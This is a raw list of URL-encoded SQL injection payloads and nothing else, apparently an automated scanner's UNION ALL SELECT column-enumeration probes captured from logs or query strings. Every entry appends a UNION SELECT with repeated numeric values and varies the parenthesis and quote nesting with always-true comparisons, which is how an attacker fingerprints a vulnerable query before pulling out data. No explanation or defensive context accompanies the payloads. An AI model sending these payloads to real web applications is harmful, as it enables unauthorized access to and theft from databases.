-3086%29%20UNION%20ALL%20SELECT%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915%2C%202915--%20%20AND%20%289459%3D9459 -5234%29%20UNION%20ALL%20SELECT%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004%2C%209004--%20%20AND%20%286221%3D6221 -9301%29%20UNION%20ALL%20SELECT%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399%2C%207399--%20%20AND%20%283919%3D3919 -8734%29%29%20UNION%20ALL%20SELECT%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593%2C%209593--%20%20AND%20%28%288907%3D8907 -7538%29%29%20UNION%20ALL%20SELECT%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721%2C%206721--%20%20AND%20%28%288413%3D8413 -2694%29%29%20UNION%20ALL%20SELECT%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464%2C%202464--%20%20AND%20%28%289571%3D9571 -3907%29%29%20UNION%20ALL%20SELECT%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683%2C%203683--%20%20AND%20%28%287678%3D7678 -7100%29%29%20UNION%20ALL%20SELECT%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732%2C%207732--%20%20AND%20%28%288163%3D8163 -8401%29%29%20UNION%20ALL%20SELECT%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189%2C%203189--%20%20AND%20%28%284070%3D4070 -8610%29%29%20UNION%20ALL%20SELECT%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740%2C%205740--%20%20AND%20%28%281630%3D1630 -5267%29%29%20UNION%20ALL%20SELECT%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049%2C%204049--%20%20AND%20%28%281009%3D1009 -4016%29%29%20UNION%20ALL%20SELECT%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903%2C%201903--%20%20AND%20%28%288054%3D8054 -4114%29%29%20UNION%20ALL%20SELECT%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281%2C%207281--%20%20AND%20%28%282310%3D2310 -5595%29%29%29%20UNION%20ALL%20SELECT%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879%2C%207879--%20%20AND%20%28%28%281833%3D1833 -6959%29%29%29%20UNION%20ALL%20SELECT%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249%2C%201249--%20%20AND%20%28%28%285410%3D5410 -1987%29%29%29%20UNION%20ALL%20SELECT%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769--%20%20AND%20%28%28%289745%3D9745 -6522%29%29%29%20UNION%20ALL%20SELECT%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964%2C%206964--%20%20AND%20%28%28%287704%3D7704 -1422%29%29%29%20UNION%20ALL%20SELECT%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169%2C%202169--%20%20AND%20%28%28%288569%3D8569 -5179%29%29%29%20UNION%20ALL%20SELECT%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726%2C%203726--%20%20AND%20%28%28%287517%3D7517 -4709%29%29%29%20UNION%20ALL%20SELECT%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094%2C%203094--%20%20AND%20%28%28%285692%3D5692 -2747%29%29%29%20UNION%20ALL%20SELECT%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233%2C%205233--%20%20AND%20%28%28%289424%3D9424 -2009%29%29%29%20UNION%20ALL%20SELECT%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237%2C%205237--%20%20AND%20%28%28%287865%3D7865 -7656%29%29%29%20UNION%20ALL%20SELECT%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023%2C%202023--%20%20AND%20%28%28%288264%3D8264 -6119%20UNION%20ALL%20SELECT%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391%2C%206391--%20 -4119%20UNION%20ALL%20SELECT%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807%2C%209807--%20 -4331%20UNION%20ALL%20SELECT%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583%2C%201583--%20 -1093%20UNION%20ALL%20SELECT%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468%2C%206468--%20 -8530%20UNION%20ALL%20SELECT%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764%2C%204764--%20 -7286%20UNION%20ALL%20SELECT%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176--%20 -4935%20UNION%20ALL%20SELECT%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966--%20 -8416%20UNION%20ALL%20SELECT%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833%2C%201833--%20 -6949%20UNION%20ALL%20SELECT%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084%2C%204084--%20 -6400%20UNION%20ALL%20SELECT%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110%2C%207110--%20 -6160%27%29%20UNION%20ALL%20SELECT%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130%2C%205130--%20%20AND%20%28%27hQiY%27%3D%27hQiY -1667%27%29%20UNION%20ALL%20SELECT%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487--%20%20AND%20%28%27FGtQ%27%3D%27FGtQ -4965%27%29%20UNION%20ALL%20SELECT%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190%2C%202190--%20%20AND%20%28%27SsKc%27%3D%27SsKc -3541%27%29%20UNION%20ALL%20SELECT%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131%2C%203131--%20%20AND%20%28%27ZHdz%27%3D%27ZHdz -1190%27%29%20UNION%20ALL%20SELECT%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134%2C%208134--%20%20AND%20%28%27eBGx%27%3D%27eBGx -7337%27%29%20UNION%20ALL%20SELECT%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047%2C%207047--%20%20AND%20%28%27DtmH%27%3D%27DtmH -4629%27%29%20UNION%20ALL%20SELECT%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087%2C%209087--%20%20AND%20%28%27hIrz%27%3D%27hIrz -6915%27%29%20UNION%20ALL%20SELECT%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626%2C%202626--%20%20AND%20%28%27vJun%27%3D%27vJun -6792%27%29%20UNION%20ALL%20SELECT%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368%2C%203368--%20%20AND%20%28%27yRQu%27%3D%27yRQu -2411%27%29%20UNION%20ALL%20SELECT%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789%2C%204789--%20%20AND%20%28%27QXKJ%27%3D%27QXKJ -9588%27%29%29%20UNION%20ALL%20SELECT%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086%2C%202086--%20%20AND%20%28%28%27kvwy%27%3D%27kvwy -6403%27%29%29%20UNION%20ALL%20SELECT%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586%2C%202586--%20%20AND%20%28%28%27eali%27%3D%27eali -4687%27%29%29%20UNION%20ALL%20SELECT%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725%2C%206725--%20%20AND%20%28%28%27fovE%27%3D%27fovE -4537%27%29%29%20UNION%20ALL%20SELECT%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556%2C%204556--%20%20AND%20%28%28%27VBmW%27%3D%27VBmW -6557%27%29%29%20UNION%20ALL%20SELECT%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472%2C%201472--%20%20AND%20%28%28%27mhnF%27%3D%27mhnF 